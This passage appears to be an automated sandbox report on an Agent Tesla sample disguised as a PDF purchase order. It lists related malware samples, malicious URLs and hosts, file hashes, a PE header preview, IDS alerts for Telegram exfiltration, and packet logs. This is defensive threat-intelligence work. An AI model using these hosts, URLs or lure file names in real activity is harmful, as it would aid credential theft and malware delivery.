                            KBGC_1200O000000_98756.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              GeriOdemeBildirimi942.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                08(2)_00.exeGet hashmaliciousAgentTeslaBrowse
                                  Hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      T3xpD9ZaYu.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        SCANNED COPY.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          67.212.175.162BITUMEN_60-70_-_JUMBO_Specification.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                          • www.northjerseylocksmith.net/2nbp/?ab=tQVjVQ6bjwqqy2lbRpj5JhQnGfuizPNGdMEYuGKFTCiSTnfJxBy0WSIOyM01nCZIZatbO6YbONw5Q3bQ/V1g60uhCq/kzTYQUQ==&wZHp=LTklpdd0lp
                                          EL-515-_HEAT_TRACING.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                          • www.northjerseylocksmith.net/2nbp/?I8Z=tQVjVQ6bjwqqy2lbRpj5JhQnGfuizPNGdMEYuGKFTCiSTnfJxBy0WSIOyM01nCZIZatbO6YbONw5Q3bQ/V1tnGq8XaOUlQYxDpzveej3TzCy&WN6=OLgLTlRhCRRxTxN

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          wymascensores.comPO_9876563647-FLOWTRONIX (FT)UUE.exeGet hashmaliciousAgentTeslaBrowse
                                          • 67.212.175.162
                                          Richardson Electronics, LTD. PRD10221301UUE.exeGet hashmaliciousAgentTeslaBrowse
                                          • 67.212.175.162
                                          PURCHASE ORDER ADDISON-6378397379UUE.exeGet hashmaliciousAgentTeslaBrowse
                                          • 67.212.175.162
                                          Teklif-6205018797-6100052155-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                          • 67.212.175.162
                                          RFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 67.212.175.162
                                          Su documento de env#U00edo--------pdf.exeGet hashmaliciousUnknownBrowse
                                          • 67.212.175.162
                                          Su documento de env#U00edo--------pdf.exeGet hashmaliciousUnknownBrowse
                                          • 67.212.175.162
                                          1715875158543a5e3b677362bc060cf9b6a7a69e2457d0c48ef2d6bda0e2ce3c4ddc38a017752.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                          • 67.212.175.162
                                          Teklif 8822321378 .exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          • 67.212.175.162
                                          api.telegram.orgenigma.tech.exeGet hashmaliciousBlank GrabberBrowse
                                          • 149.154.167.220
                                          1.cmdGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          2.cmdGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          KBGC_1200O000000_98756.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 149.154.167.220
                                          GeriOdemeBildirimi942.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 149.154.167.220
                                          08(2)_00.exeGet hashmaliciousAgentTeslaBrowse
                                          • 149.154.167.220
                                          Hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 149.154.167.220
                                          hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 149.154.167.220
                                          T3xpD9ZaYu.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                          • 149.154.167.220
                                          SCANNED COPY.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 149.154.167.220

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          TELEGRAMRUBnxBRWQWhy.exeGet hashmaliciousStealc, VidarBrowse
                                          • 149.154.167.99
                                          NJna3TEAEr.exeGet hashmaliciousStealc, VidarBrowse
                                          • 149.154.167.99
                                          enigma.tech.exeGet hashmaliciousBlank GrabberBrowse
                                          • 149.154.167.220
                                          1.cmdGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          2.cmdGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          gp4uQBDTP8.exeGet hashmaliciousXehook StealerBrowse
                                          • 149.154.167.99
                                          dNNMgwxY4f.exeGet hashmaliciousXehook StealerBrowse
                                          • 149.154.167.99
                                          KBGC_1200O000000_98756.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 149.154.167.220
                                          GeriOdemeBildirimi942.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 149.154.167.220
                                          08(2)_00.exeGet hashmaliciousAgentTeslaBrowse
                                          • 149.154.167.220
                                          SINGLEHOP-LLCUShttps://novanutrix.com/vn%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/Get hashmaliciousUnknownBrowse
                                          • 198.143.164.252
                                          https://novanutrix.com/vn%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/Get hashmaliciousUnknownBrowse
                                          • 198.143.164.252
                                          yakov.ppc.elfGet hashmaliciousMiraiBrowse
                                          • 198.20.85.251
                                          inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exeGet hashmaliciousAgentTeslaBrowse
                                          • 67.212.175.162
                                          PO_9876563647-FLOWTRONIX (FT)UUE.exeGet hashmaliciousAgentTeslaBrowse
                                          • 67.212.175.162
                                          https://sandbox-2.digital68.com/Get hashmaliciousUnknownBrowse
                                          • 198.143.164.252
                                          https://ebookkeepers.com.pk/Get hashmaliciousUnknownBrowse
                                          • 198.143.164.252
                                          http://dev-bdvonlinecreditos.pantheonsite.io/Get hashmaliciousUnknownBrowse
                                          • 198.143.164.252
                                          https://dev-bdvemprendeven.pantheonsite.io/Get hashmaliciousUnknownBrowse
                                          • 198.143.164.252
                                          http://dev-cdn370.pantheonsite.ioGet hashmaliciousUnknownBrowse
                                          • 198.143.164.252

                                          JA3 Fingerprints

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          3b5074b1b5d032e5620f69f9f700ff0eNew order.exeGet hashmaliciousAgentTeslaBrowse
                                          • 149.154.167.220
                                          • 67.212.175.162
                                          Refrence-Order#63729.pdfGet hashmaliciousAzorultBrowse
                                          • 149.154.167.220
                                          • 67.212.175.162
                                          ra66DSpa.exeGet hashmaliciousXWormBrowse
                                          • 149.154.167.220
                                          • 67.212.175.162
                                          https://www.sexpartnercommunity.com/?e7ak3e0m=57296397&tba4bck7=eyJpdiI6Imp1cHMxdGJERWI4SjBwNVYvSWdWeHc9PSIsInZhbHVlIjoiSGhGdTY1TlFyN1JJQm03UEJhZGZxQjV2NncyZ0JWajdJZnRWaWNBZlM2dzVxV05KdGx3TXZaaURxZzgraDNUYURDK2EwcFUra28rNEE2YTdRYWRhdFdwQkxaL09xeDRCVUt0Rm1IT3cxa3hPd1huM3FkN3NzNS9BYjEwV2hOY3dzblZ6TW1TaUdDeXBOTG9zc2FtU0VZKzhNeVgzS1FkTnE3WnA5NUZqWXJTQkVaNlN1UmUrZFFTUlZzZ05pbVlnIiwibWFjIjoiOTFjZDc5Y2FhNTBkNGYyYWYzZDRiYzhlYjljMjZmYTE1MzBhNGI2MmQ0NTFhYmYyZmVjN2IwMGUyNmFlNjU3MCIsInRhZyI6IiJ9&spaRoute=/livecams/all&trk=toza80hGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          • 67.212.175.162
                                          http://masdeliveryusa.com/Get hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          • 67.212.175.162
                                          file.exeGet hashmaliciousCredential FlusherBrowse
                                          • 149.154.167.220
                                          • 67.212.175.162
                                          tMREqVW0.exeGet hashmaliciousXWormBrowse
                                          • 149.154.167.220
                                          • 67.212.175.162
                                          https://wvr4dgzxxavl6jjpq7rl.igortsaplin.pro/WFzFCiNxGet hashmaliciousHTMLPhisherBrowse
                                          • 149.154.167.220
                                          • 67.212.175.162
                                          wSVyC8FY.exeGet hashmaliciousXWormBrowse
                                          • 149.154.167.220
                                          • 67.212.175.162
                                          https://ahchoadeegu.homes?u=k8pp605&o=c9ewtnr&t=8845Get hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          • 67.212.175.162

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe

                                          Download File
                                          Process:C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):1559040
                                          Entropy (8bit):5.696768028019976
                                          Encrypted:false
                                          SSDEEP:24576:5qB+ONv0iCIg2p02MKcGXqExSApwS3bFnI/3:5e+ON8iCIHx0k
                                          MD5:BFEA25F0CBF64304AAA2C361805D5E51
                                          SHA1:700796263C71C76607CBBD74678B0B084D7BDB7C
                                          SHA-256:0870D9107C380E8A94587E7924B1230D146EA21C6BBC7B9731BFF408204AB8D0
                                          SHA-512:88A62BC3B24B5FA43FA7A3BFE5075C50E36AE84A526B4FC34607CBFD9B525D8DD6BAA4DB4CFDD396E7E6355E3EDE35744AE0E4CF6635B8CEA780A8BDF63F6260
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 34%
                                          • Antivirus: Virustotal, Detection: 25%, Browse
                                          Reputation:low
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:.f................................. ........@.. ....................... ............`.....................................O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........p...m...........>...2..........................................s.k....?.En....?.p.{...?...pP..?_ .&C..?&;..|..?...\6.?....|b.?..E.Y..?..:.>b.?..T....?.......?.G..F..?.......?V.5...?......?A@.....?.tb.C#.?^.q.a..?V...v.?..?u...?...6..?|.\g.?..G..?.B.I...?9...a.?A.rr..y?..h%<.n?.+..V:b?.qKx..T?.G..F?...V.[8?.@:.,.(?...J"..?4..)...?..I.,a.>.s..4..>...Y...>..)-.g.>."..:.>..=l...>..b..c>w K ..D>t.dC.$>.......>.1.....=b.{....=.......=E.z.<gv....>.p?Z...S.v?

                                          C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe:Zone.Identifier

                                          Download File
                                          Process:C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:modified
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:3:ggPYV:rPYV
                                          MD5:187F488E27DB4AF347237FE461A079AD
                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                          Malicious:true
                                          Reputation:high, very likely benign file
                                          Preview:[ZoneTransfer]....ZoneId=0

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):5.696768028019976
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          • DOS Executable Generic (2002/1) 0.01%
                                          File name:RFQ__PO_PO 24090041-PDF____PDF.exe
                                          File size:1'559'040 bytes
                                          MD5:bfea25f0cbf64304aaa2c361805d5e51
                                          SHA1:700796263c71c76607cbbd74678b0b084d7bdb7c
                                          SHA256:0870d9107c380e8a94587e7924b1230d146ea21c6bbc7b9731bff408204ab8d0
                                          SHA512:88a62bc3b24b5fa43fa7a3bfe5075c50e36ae84a526b4fc34607cbfd9b525d8dd6baa4db4cfdd396e7e6355e3ede35744ae0e4cf6635b8cea780a8bdf63f6260
                                          SSDEEP:24576:5qB+ONv0iCIg2p02MKcGXqExSApwS3bFnI/3:5e+ON8iCIHx0k
                                          TLSH:32755B8CF798FE23D56D733A65B505108B74C0466393AB8769A0E9F42E0B7D41D0E2EB
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:.f................................. ........@.. ....................... ............`................................

                                          File Icon

                                          Icon Hash:90cececece8e8eb0

                                          Static PE Info

                                          General

                                          Entrypoint:0x57deee
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x66FE3A1D [Thu Oct 3 06:30:53 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x17de9c0x4f.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x17e0000x586.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1800000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000x17bef40x17c00046b76c160a91af7d8ef49fd604ebe0bbFalse0.32212556537828946data5.699231578212718IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rsrc0x17e0000x5860x60061cb7ef0faa0ed3a2f9c07436fba9e11False0.416015625data4.031921831607202IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0x1800000xc0x2003755f3405058efa33324e816daedcdb1False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_VERSION0x17e0a00x2fcdata0.43848167539267013
                                          RT_MANIFEST0x17e39c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                          Imports

                                          DLLImport
                                          mscoree.dll_CorExeMain

                                          Network Behavior

                                          Suricata IDS Alerts

                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2024-10-04T06:22:07.724812+02002851779ETPRO MALWARE Agent Tesla Telegram Exfil1192.168.2.449731149.154.167.220443TCP
                                          2024-10-04T06:22:07.724812+02002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.449731149.154.167.220443TCP
                                          2024-10-04T06:22:07.725111+02002854281ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound1149.154.167.220443192.168.2.449731TCP
                                          2024-10-04T06:22:21.257844+02002851779ETPRO MALWARE Agent Tesla Telegram Exfil1192.168.2.449734149.154.167.220443TCP
                                          2024-10-04T06:22:21.257844+02002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.449734149.154.167.220443TCP
                                          2024-10-04T06:22:21.258483+02002854281ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound1149.154.167.220443192.168.2.449734TCP
                                          2024-10-04T06:22:29.093614+02002851779ETPRO MALWARE Agent Tesla Telegram Exfil1192.168.2.449741149.154.167.220443TCP
                                          2024-10-04T06:22:29.093614+02002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.449741149.154.167.220443TCP
                                          2024-10-04T06:22:29.093972+02002854281ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound1149.154.167.220443192.168.2.449741TCP

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Oct 4, 2024 06:22:03.380930901 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:03.380980968 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:03.381222963 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:03.394839048 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:03.394942999 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:03.911187887 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:03.911322117 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:03.914498091 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:03.914551973 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:03.915088892 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:03.960304022 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.003478050 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.087722063 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.087788105 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.087809086 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.087949991 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.087949991 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.087982893 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.107513905 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.107722044 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.107752085 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.156163931 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.169352055 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.169368982 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.169612885 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.169940948 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.169940948 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.170238018 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.170253992 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.170458078 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.170722961 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.170732975 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.170907021 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.194200993 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.194232941 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.194497108 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.255136967 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.255193949 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.255319118 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.255459070 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.255459070 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.255459070 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.255525112 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.255573988 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.255625010 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.255954027 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.256210089 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.256751060 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.256820917 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.256944895 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.256944895 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.257013083 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.257071018 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.257560968 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.257783890 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.258445978 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.258583069 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.279993057 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.280242920 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.341209888 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.341417074 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.341515064 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.341516018 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.341548920 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.341581106 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.341619015 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.341706991 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.341896057 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.341957092 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.342643023 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.342775106 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.342782021 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.342853069 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.342909098 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.342909098 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.343543053 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.343643904 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.343746901 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.343746901 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.343811989 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.343869925 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.344330072 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.344413042 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.344472885 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.344547987 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.365845919 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.365942001 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.366000891 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.366080999 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.413619995 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.413903952 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.427458048 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.427678108 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.427699089 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.427731037 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.427862883 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.428006887 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.428006887 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.428076982 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.428495884 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.428580999 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.428601027 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.428839922 CEST4434973067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:04.428910971 CEST49730443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:04.428922892 CEST4434973067.212.175.162192.168.2.4
